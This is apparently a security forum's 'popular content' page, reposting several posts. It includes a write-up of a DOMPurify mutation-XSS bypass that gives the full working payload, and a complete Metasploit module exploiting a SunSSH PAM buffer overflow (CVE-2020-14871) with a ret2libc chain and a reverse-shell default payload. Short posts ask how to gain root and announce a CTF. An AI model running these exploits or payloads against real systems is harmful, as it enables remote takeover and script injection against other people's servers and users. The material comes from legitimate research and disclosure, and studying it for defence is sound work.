Leaderboard

Popular Content

Showing content with the highest reputation on 12/24/20 in all areas

  1. I got the money back. After 17 days, but better late than never. This can be closed, thank you.
    1 point
  2. For those who are only interested in the final payload, here you go (I won’t judge). For the ones interested in why it works, please bear with me.

     <form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">

     First of all, I would like to point out that this article and the bypass described here are heavily based on Michał Bentkowski's (@SecurityMB) research. The original article and previous bypass that made it possible for me to find this new vector are available here. The article also contains all of the required foundations the reader may need to properly understand how and why the bypass described here works. It took me a few rounds of reading and playing with the LiveDOM++ tool, also provided by @SecurityMB, to really understand why Michał’s original bypass worked in the first place. Gareth Heyes (@garethheyes) also built upon Michał’s work and found a variation of the original bypass days after it got published. I also took my time with Gareth’s bypass to properly understand what was going on.

     What is DOMPurify?

     DOMPurify is a widely used HTML sanitizer library. It is mainly used to sanitize user input on web applications that permit the creation of HTML/Rich Text content. Think of a web-mail client or blog platform, for example. A common usage pattern for DOMPurify is the following:

     let div = document.createElement('div');
     const html = '<some></non sanitized=1></html>';
     const sanitized = DOMPurify.sanitize(html);
     div.innerHTML = sanitized;

     DOMPurifyUsageSample.js

     According to Michał’s article: "The important takeaway is that the HTML markup is parsed twice and serialized into a string in between."

     Namespaces, and why they are important

     HTML is a markup language based on XML. XML utilizes the concept of namespaces. An HTML document, compliant with the current specification of HTML 5, may contain elements from three different namespaces:

     HTML (http://www.w3.org/1999/xhtml)
     SVG (http://www.w3.org/2000/svg)
     MathML (http://www.w3.org/1998/Math/MathML)

     Namespaces solve the ambiguity problem when a single XML document contains homograph elements and/or properties from different “vocabularies”. For example, all the previously listed specifications contain a tag named style. The style tag has different properties and rendering behaviors associated with it depending on the namespace it's used in. This means that a browser will behave differently when it parses a style tag depending on its ancestors (Figure 1, Figure 2).

     Figure 2: style tag in the SVG namespace

     DOM mutation in a nutshell

     Although it may sound counter-intuitive, parsing and serializing a DOM fragment is not an idempotent operation. This means that in some cases, depending on how the fragment is constructed, the serialized version of a DOM tree won’t result in the same DOM tree when parsed. This double-parsing behavior is inherent to DOMPurify’s standard usage. However, some unexpected results from double-parsing DOM fragments are not unexpected at all, as they are documented in HTML’s current specification. One of these cases regards nested forms. A DOM fragment with nested form tags is not to be considered a valid construction according to HTML’s current specification. However, the following HTML fragment, when parsed once, will result in a DOM tree with nested forms.

     <form id="outer">
     <div>
     </form>
     <form id="inner">
     <input>

     Snippet 2: nested form mutation gadget nfgadget.html

     We can use the LiveDOM++ tool to inspect how the DOM behaves, before and after being sanitized with DOMPurify, when it is fed with the HTML fragment mentioned above.

     Figure 3: nested forms parsed twice

     As demonstrated, when parsed for the first time, the HTML fragment results in a non-compliant DOM tree containing nested form tags. After sanitizing it, DOMPurify will serialize the DOM tree and the resulting string will be parsed again by the browser. It is then possible to verify that the direct parenthood of the input tag is transferred from the inner form tag to the outer form tag in the final fragment. We will refer to the type of HTML markup that results in a mutation that changes the direct parent of a tag as an ownership mutation gadget. The table tag can also be used to construct an ownership mutation gadget, as shown below.

     Figure 4: table ownership mutation gadget

     In the example above the direct parent of the inner anchor tag is changed from the outer anchor to the div tag. Understanding how these gadgets behave is crucial to understanding the bypass construction. I recommend experimenting with the gadgets on LiveDOM++ to get a better understanding of how the gadgets behave.

     Foreign content

     By default, all elements in an HTML document must be parsed by a browser according to the rules defined by the HTML namespace; however, if the parser encounters a <svg> or <math> tag, it should then parse those elements and their descendants according to the SVG and MathML namespaces respectively. One also needs to consider that both the MathML and SVG namespaces support foreign content as well, meaning a chain of namespace transitions can be built as shown below.

     Figure 5: html->svg->math->html transition chain

     Namespace confusion, putting it all together

     As mentioned before, homograph elements like the style tag have different properties and rendering rules depending on the namespace they are in. This means that if we use an ownership mutation gadget to change the direct parent of a homograph tag and cause its namespace to change, we can trick the sanitizer into producing a malicious serialized HTML fragment. That is exactly what Michał did. Michał’s original bypass used an ownership mutation gadget to change the direct parent of a mglyph tag from a form element in the HTML namespace to a mtext tag in the MathML namespace. This mutation results in the descendants of the mglyph element becoming members of the MathML namespace in the final DOM tree while existing in the HTML namespace in the tree sanitized by DOMPurify. At the time of this writing, it is still possible to use the update parser feature of the LiveDOM++ tool to reproduce the original bypass using a vulnerable version of DOMPurify.

     Figure 6: update parser feature
     Figure 7: original mXSS bypass

     The details of why and how this works can be referenced in Michał’s original article. Understanding the original bypass is important because it provides the foundation for the variation described in this article.

     Building the final payload

     Now that I have described the building blocks of a potential bypass, I will describe the methodology I used to build my bypass. I began by pondering the following:

     The picture below illustrates the basic structure of the bypass. Using a nested form ownership mutation gadget it is possible to change the mglyph tag's parent to mtext; that places the descendants of the mglyph tag in the MathML namespace in the final DOM tree. Nothing new so far. The difference is that instead of using it to go from HTML to MathML, we are using it to go from SVG to MathML. HTML→MathML→HTML→SVG to HTML→MathML, to be precise.

     Figure 8: from SVG to MathML

     At this point, I knew I was on to something, but it took me a while to build a working payload. The whole point was figuring out a chain of tags that were safe in the SVG namespace and that contained an XSS payload when transferred to the MathML namespace. This is what I came up with:

     <mtext>
     <style>
     <path id="</style><img onerror=alert(1) src>">

     Snippet 2: bypass fragment svggadget.html

     In the SVG namespace, mtext will be handled as an unknown tag. The style tag's descendants will be rendered, as opposed to its homograph in the HTML namespace, and the id attribute of the SVG path tag is nothing more than a safe, free-form text identifier. What happens when this snippet is parsed in the MathML namespace, though? Here is the result:

     Figure 9: bypass fragment in the MathML namespace

     First of all, mtext is handled as a MathML text integration point. This means its descendants will be in the HTML namespace, according to MathML’s current specification. Once in the HTML namespace, style behaves differently and treats everything until its closing tag as raw text. Finally, the malicious img tag is parsed, followed by a harmless piece of raw text that reads “>. The following snapshot depicts the DOM tree state before being sanitized by DOMPurify.

     Figure 10: final payload DOM tree before sanitization

     This next snapshot shows the DOM tree produced by parsing DOMPurify’s output.

     Figure 11: final payload DOM tree after sanitization

     Disclosure timeline

     I notified cure53 on 11/02/2020 around 13:30 (GMT-6). A fix was made available and tested at 13:41 (GMT-6). The fix was officially published in version 2.2.2 sometime later on the very same day.

     Acknowledgments

     I want to thank Michał Bentkowski and Gareth Heyes for their incredible work and constant contributions to the security community. Dr.-Ing. Mario Heiderich (@Cure53) for acting so fast and for being a gentleman despite having to stay up late to work on the fix. Lastly, @LiveOverFlow for reminding me in one of his videos that we need to move away from the basics as soon as we master them and constantly challenge ourselves.

     Source: https://vovohelo.medium.com/from-svg-and-back-yet-another-mutation-xss-via-namespace-confusion-for-dompurify-2-2-2-bypass-5d9ae8b1878f
    1 point
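The namespace rules the article above walks through (text integration points, foreign content, mglyph staying in MathML) as an added example that is not code from the original post or from DOMPurify: a small model of the HTML5 tree-construction dispatch for one chain of nested start tags, which shows why the same <style> is parsed markup under <svg> but raw text under a MathML <mtext>. It models only a single ancestor chain and assumes the simplifications noted in the comments.

```javascript
// Added illustration (not DOMPurify's code): a minimal model of the HTML5
// tree-construction dispatch rules for one chain of nested start tags.
// Assumptions: attribute adjustment, annotation-xml integration points and
// parse-error recovery are left out; they do not affect the chains shown.
const HTML = 'html', SVG = 'svg', MATHML = 'mathml';
// MathML text integration points: children use HTML rules, except
// mglyph/malignmark, which stay in MathML.
const MATHML_TEXT_IP = new Set(['mi', 'mo', 'mn', 'ms', 'mtext']);
// SVG HTML integration points: children use HTML rules.
const SVG_HTML_IP = new Set(['foreignObject', 'desc', 'title']);
// Start tags that break out of foreign content back into HTML parsing.
const BREAKOUT = new Set(('b big blockquote body br center code dd div dl dt em ' +
  'embed h1 h2 h3 h4 h5 h6 head hr i img li listing menu meta nobr ol p pre ' +
  'ruby s small span strong strike sub sup table tt u ul var').split(' '));

// Namespace given to a start tag by the ordinary HTML insertion modes.
function htmlRule(tag) {
  if (tag === 'svg') return SVG;
  if (tag === 'math') return MATHML;
  return HTML;
}

// tags: start-tag names, each nested directly inside the previous one.
// Returns [{ name, ns }] with the namespace each element is created in.
function resolveChain(tags) {
  const out = [];
  for (const tag of tags) {
    const parent = out[out.length - 1];
    let ns;
    if (!parent || parent.ns === HTML) {
      ns = htmlRule(tag);
    } else if (parent.ns === MATHML && MATHML_TEXT_IP.has(parent.name)) {
      ns = (tag === 'mglyph' || tag === 'malignmark') ? MATHML : htmlRule(tag);
    } else if (parent.ns === SVG && SVG_HTML_IP.has(parent.name)) {
      ns = htmlRule(tag);
    } else if (BREAKOUT.has(tag)) {
      ns = HTML; // the parser first pops the foreign ancestors
    } else {
      ns = parent.ns; // "in foreign content": inherit the current node's namespace
    }
    out.push({ name: tag, ns });
  }
  return out;
}

// True when the innermost element is an HTML <style>, whose content is raw
// text up to </style>; an SVG or MathML style is parsed as markup instead.
function styleIsRawText(tags) {
  const last = resolveChain(tags).pop();
  return !!last && last.name === 'style' && last.ns === HTML;
}
```

Feeding it the article's chain before and after the nested-form mutation shows the style element moving from the SVG namespace to the HTML namespace, which is the whole reason the serialized fragment is parsed differently the second time.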
  3. This Metasploit module exploits a stack-based buffer overflow in the Solaris PAM library's username parsing code, as used by the SunSSH daemon when the keyboard-interactive authentication method is specified. Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in VirtualBox, VMware Fusion, and VMware Player. Bare metal untested. Your addresses may vary.

     ##
     # This module requires Metasploit: https://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     class MetasploitModule < Msf::Exploit::Remote
       Rank = NormalRanking

       prepend Msf::Exploit::Remote::AutoCheck
       include Msf::Exploit::Remote::CheckModule
       include Msf::Exploit::Remote::SSH

       def initialize(info = {})
         super(
           update_info(
             info,
             'Name' => 'Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow',
             'Description' => %q{
               This module exploits a stack-based buffer overflow in the Solaris PAM
               library's username parsing code, as used by the SunSSH daemon when the
               keyboard-interactive authentication method is specified.

               Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in VirtualBox,
               VMware Fusion, and VMware Player. Bare metal untested. Your addresses
               may vary.
             },
             'Author' => [
               'Jacob Thompson', # Analysis
               'Aaron Carreras', # Analysis
               'Jeffrey Martin', # Testing
               'Hacker Fantastic', # PoC
               'wvu' # Exploit
             ],
             'References' => [
               ['CVE', '2020-14871'],
               ['URL', 'https://www.oracle.com/security-alerts/cpuoct2020.html'],
               ['URL', 'https://www.fireeye.com/blog/threat-research/2020/11/critical-buffer-overflow-vulnerability-in-solaris-can-allow-remote-takeover.html'],
               ['URL', 'https://hacker.house/lab/cve-2020-18471/'],
               ['URL', 'https://twitter.com/hackerfantastic/status/1323431512822435841']
             ],
             'DisclosureDate' => '2020-10-20', # Vendor advisory
             'License' => MSF_LICENSE,
             'Platform' => 'unix',
             'Arch' => ARCH_CMD,
             'Privileged' => true,
             'Payload' => {
               # https://github.com/illumos/illumos-gate/blob/edd669a7ce20a2f7406e8f00489c426c0690f1bd/usr/src/lib/libpam/pam_framework.c#L615-L617
               'BadChars' => "\x00\x09\x20",
               'Encoder' => 'cmd/perl'
             },
             'Targets' => [
               [
                 'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware',
                 {
                   'Ident' => 'SSH-2.0-Sun_SSH_1.1.5',
                   'LibcBase' => 0xfeb90000
                 }
               ],
               [
                 'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox',
                 {
                   'Ident' => 'SSH-2.0-Sun_SSH_1.1.5',
                   'LibcBase' => 0xfeb80000
                 }
               ]
             ],
             'DefaultTarget' => 0,
             'DefaultOptions' => {
               'PAYLOAD' => 'cmd/unix/reverse_perl',
               'SSH_TIMEOUT' => 2,
               'CheckModule' => 'auxiliary/scanner/ssh/ssh_version'
             },
             'Notes' => {
               'Stability' => [CRASH_SERVICE_RESTARTS],
               'Reliability' => [REPEATABLE_SESSION],
               'SideEffects' => [ACCOUNT_LOCKOUTS, IOC_IN_LOGS]
             }
           )
         )
       end

       def check
         # Run auxiliary/scanner/ssh/ssh_version
         checkcode = super
         return checkcode unless checkcode == CheckCode::Detected

         unless target['Ident'] == checkcode.details[:ident]
           return CheckCode::Safe("#{target.name} is an incompatible target.")
         end

         CheckCode::Appears("#{target.name} is a compatible target.")
       end

       def exploit
         print_status("Exploiting #{target.name}")

         ssh_client_opts = ssh_client_defaults.merge(
           port: rport,
           auth_methods: ['keyboard-interactive'],
           password: ret2libc, # HACK: This is really the username prompt on Solaris
           timeout: datastore['SSH_TIMEOUT']
         )

         ssh_client_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

         print_status("Yeeting #{datastore['PAYLOAD']} at #{peer}")

         # Empty initial username
         Net::SSH.start(rhost, '', ssh_client_opts)
       rescue Net::SSH::AuthenticationFailed
         print_error(CheckCode::Safe.message)
       rescue Net::SSH::Disconnect
         print_warning('Disconnected, target selection may be incorrect!')
       rescue Net::SSH::ConnectionTimeout
         # Do nothing on success
       end

       # XXX: No ASLR, but libc base changes...
       def ret2libc
         buf = rand_text(516)
         buf << p32(target['LibcBase'] + 0x23904) # add esp, 8; ret
         buf << rand_text(4)
         buf << p32(0x08040101) # ecx
         buf << p32(0x0805ba07) # pop ecx; pop edx; pop ebp; ret
         buf << p32(target['LibcBase'] + 0x256d0) # exit(3)
         buf << p32(target['LibcBase'] + 0x91edf) # system(3)
         buf << rand_text(4)
         buf << p32(target['LibcBase'] + 0xae3f1) # push esp; and al, 0; push ecx; push edx; ret
         buf << payload.encoded
       end

       def p32(addr)
         [addr].pack('V')
       end
     end

     Source
    1 point
  4. Can someone teach me how to do a root from scratch?
    1 point
  5. 20 November 2020, 10:00 - 18:00

     Contest prizes:
     1st place - 3000 RON
     2nd place - 2000 RON
     3rd place - 1000 RON
     Best write-up - 500 RON

     The prizes are funded by donations from community members: Nytro, malsploit, Dragos, dancezar, Matasareanu. We are going through a hard time and our suggestion is that the prizes be donated, if that is possible. For CTF-related discussions we will use the #ctf channel on Slack. The contest results will be presented at 18:00. Full details: https://ctf.rstcon.com/
    1 point
  6. There is no working download link and this seems like a real good piece of software to have. Can someone be so kind and post a working download link (and username/password if required). Thanks so much in advance.
    1 point